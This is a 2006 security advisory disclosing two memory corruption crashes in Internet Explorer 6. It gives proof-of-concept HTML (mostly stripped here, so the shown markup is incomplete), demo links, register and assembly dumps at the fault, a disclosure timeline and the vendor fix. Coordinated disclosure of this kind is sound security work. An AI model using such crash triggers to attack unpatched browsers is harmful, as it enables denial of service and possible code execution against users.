-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 --------------------------------------------------- | BuHa Security-Advisory #13 | May 25th, 2006 | --------------------------------------------------- | Vendor | MS Internet Explorer 6.0 | | URL | http://www.microsoft.com/windows/ie/ | | Version | <= 6.0.2900.2180.xpsp_sp2 | | Risk | Critical (Memory Corruption) | --------------------------------------------------- The Microsoft Security Response Center rated following issues as critical because, on the face of it, they could produce an exploitable memory corruption (see HTML Tag Memory Corruption Vulnerability - CVE-2006-1188 [1]) with a variant of my PoC. o Description: ============= Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser made by Microsoft and currently available as part of Microsoft Windows. Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. o Memory Corruption Vulnerability: #7d519030 ================================= Following HTML code forces IE 6 to crash: > "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> >

> 

> 
> 
> 
> 
    
> 
> 
    
> 
    
> 
     
> 
> 
> 
> 
 
>
> 
>

> > Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html These are the register values and the ASM dump at the time of the access violation: > eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 > edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894 > > 7d519012 55 push ebp > 7d519013 8bec mov ebp,esp > 7d519015 8b4104 mov eax,[ecx+0x4] > 7d519018 394508 cmp [ebp+0x8],eax > 7d51901b 7c09 jl mshtml+0x69026 (7d519026) > 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb) > 7d51901f 33c0 xor eax,eax > 7d519021 40 inc eax > 7d519022 5d pop ebp > 7d519023 c20800 ret 0x8 > 7d519026 83c8ff or eax,0xffffffff > 7d519029 ebf7 jmp mshtml+0x69022 (7d519022) > 7d51902b 90 nop > 7d51902c 90 nop > 7d51902d 90 nop > 7d51902e 90 nop > 7d51902f 90 nop > FAULT ->7d519030 8b4108 mov eax,[ecx+0x8] > ds:0023:00000008=???????? > 7d519033 85c0 test eax,eax > 7d519035 7425 jz mshtml+0x6905c (7d51905c) > 7d519037 8b10 mov edx,[eax] > 7d519039 f6c210 test dl,0x10 > 7d51903c 7408 jz mshtml+0x69046 (7d519046) > 7d51903e f6c220 test dl,0x20 > 7d519041 7519 jnz mshtml+0x6905c (7d51905c) > 7d519043 8b400c mov eax,[eax+0xc] > 7d519046 8b4808 mov ecx,[eax+0x8] > 7d519049 85c9 test ecx,ecx o Memory Corruption Vulnerability: #7d529d35 ================================= Following HTML code forces IE 6 to crash: > "http://www.w3.org/TR/html4/loose.dtd"> > > > 
>
> 
> 

> 
> 
> 
> 
> 
> 
> 
> 

> 
> 
>
> 
> 
> 
> 
> 
> 
> 
>
>
> 
> 

>  
> 
>  
>  
>    
>
> 
    
> 

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html

These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0
> edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
>
>         7d529d0e e811170000       call    mshtml+0x7b424 (7d52b424)
>         7d529d13 85c0             test    eax,eax
>         7d529d15 0f85c5500800     jne     mshtml!DllGetClassObject+0x10fa2
>                                           (7d5aede0)
>         7d529d1b 0fb65508         movzx   edx,byte ptr [ebp+0x8]
>         7d529d1f 8d849680000000   lea     eax,[esi+edx*4+0x80]
>         7d529d26 5e               pop     esi
>         7d529d27 5d               pop     ebp
>         7d529d28 c20c00           ret     0xc
>         7d529d2b 90               nop
>         7d529d2c 90               nop
>         7d529d2d 90               nop
>         7d529d2e 90               nop
>         7d529d2f 90               nop
>         7d529d30 8bff             mov     edi,edi
>         7d529d32 55               push    ebp
>         7d529d33 8bec             mov     ebp,esp
> FAULT ->7d529d35 0fbe4114         movsx   eax,byte ptr [ecx+0x14]
>                                           ds:0023:00000014=??
>         7d529d39 c1e004           shl     eax,0x4
>         7d529d3c 0578aa4b7d       add     eax,0x7d4baa78
>         7d529d41 7410             jz      mshtml+0x79d53 (7d529d53)
>         7d529d43 8b400c           mov     eax,[eax+0xc]
>         7d529d46 234508           and     eax,[ebp+0x8]
>         7d529d49 f7d8             neg     eax
>         7d529d4b 1bc0             sbb     eax,eax
>         7d529d4d f7d8             neg     eax
>         7d529d4f 5d               pop     ebp
>         7d529d50 c20400           ret     0x4
>         7d529d53 33c0             xor     eax,eax
>         7d529d55 ebf8             jmp     mshtml+0x79d4f (7d529d4f)

o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
> MS IE 6 SP2 - Win XP Pro SP2
> MS IE 6     - Win 2k SP4

o Disclosure Timeline:
=====================

xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.

o Solution:
==========

Install the latest security update (MS06-013) for Internet Explorer [2].

o Credits:
=========

Thomas Waldegger 
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-2.txt

[1] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188
[2] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: http://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEdjSQkCo6/ctnOpYRA9qlAJ9CfZxTO0qAs+6O12hmutZ6eeHoMwCghkd2
vrVBfqAxWpoJ9Ny1W8OAtEw=
=M5nj
-----END PGP SIGNATURE-----